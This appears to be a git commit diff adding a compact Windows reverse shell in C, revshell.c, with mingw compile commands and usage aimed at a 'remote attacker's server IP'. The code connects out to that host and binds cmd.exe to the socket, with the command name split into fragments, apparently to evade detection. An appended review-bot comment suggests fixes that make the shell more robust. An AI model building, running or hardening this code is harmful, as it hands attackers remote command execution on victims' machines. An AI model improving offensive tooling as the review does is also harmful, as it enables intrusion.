Simple reverse-shell added.

mgeeky 2019-06-28 13:22:06 +02:00
parent d81f92ad28
commit e1162690ea


@ -4,12 +4,12 @@
* *
* Compilation: * Compilation:
* - x64 * - x64
* $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32 * $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
* - x86 * - x86
* $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32 * $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
* *
* Usage: * Usage:
* cmd> revshell <IP> <PORT> & * cmd> revshell <IP> <PORT> &
* *
* Where: * Where:
* - ip - remote attacker's server IP * - ip - remote attacker's server IP
@ -21,7 +21,7 @@
#include <stdio.h> #include <stdio.h>
#ifdef _MSC_VER #ifdef _MSC_VER
# pragma comment(lib, "ws2_32") # pragma comment(lib, "ws2_32")
#endif #endif
int main(int argc, char *argv[]) int main(int argc, char *argv[])
@ -33,38 +33,38 @@ int main(int argc, char *argv[])
if (argc < 3) if (argc < 3)
{ {
return 0; return 0;
} }
const char *hostname = argv[1]; const char *hostname = argv[1];
unsigned int port = atoi(argv[2]); unsigned int port = atoi(argv[2]);
WSAStartup(MAKEWORD(2,2), &wsaData); WSAStartup(MAKEWORD(2,2), &wsaData);
wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
struct hostent *host = gethostbyname(hostname); struct hostent *host = gethostbyname(hostname);
strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr))); strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr)));
sin.sin_family = AF_INET; sin.sin_family = AF_INET;
sin.sin_port = htons(port); sin.sin_port = htons(port);
sin.sin_addr.s_addr = inet_addr(saddr); sin.sin_addr.s_addr = inet_addr(saddr);
WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL); WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL);
if (WSAGetLastError() == 0) if (WSAGetLastError() == 0)
{ {
STARTUPINFO sinfo = {0}; STARTUPINFO sinfo = {0};
PROCESS_INFORMATION procinfo = {0}; PROCESS_INFORMATION procinfo = {0};
sinfo.cb = sizeof(sinfo); sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESTDHANDLES; sinfo.dwFlags = STARTF_USESTDHANDLES;
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock; sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock;
char *cmd[4] = { "cm", "d.e", "x", "e" }; char *cmd[4] = { "cm", "d.e", "x", "e" };
char command[8] = ""; char command[8] = "";
snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]); snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]);
CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo); CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo);
} }
return 0; return 0;
} }
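Review bot: `gethostbyname(hostname)` returns NULL when the name does not resolve, and the following line dereferences `host->h_addr` unconditionally, so an unresolvable first argument is a null-pointer dereference; a guard such as `if (host == NULL) return 0;` before the `strcpy` covers it. The success test `if (WSAGetLastError() == 0)` reads the thread's last-error value instead of the result of the call, so checking the return of `WSAConnect` against `SOCKET_ERROR` (and likewise the returns of `WSAStartup` and `WSASocket`) is the dependable form. The declarations of `saddr`, `sin` and `wsock` sit between the second and third hunks, so the size of the `strcpy` destination cannot be confirmed from the visible lines.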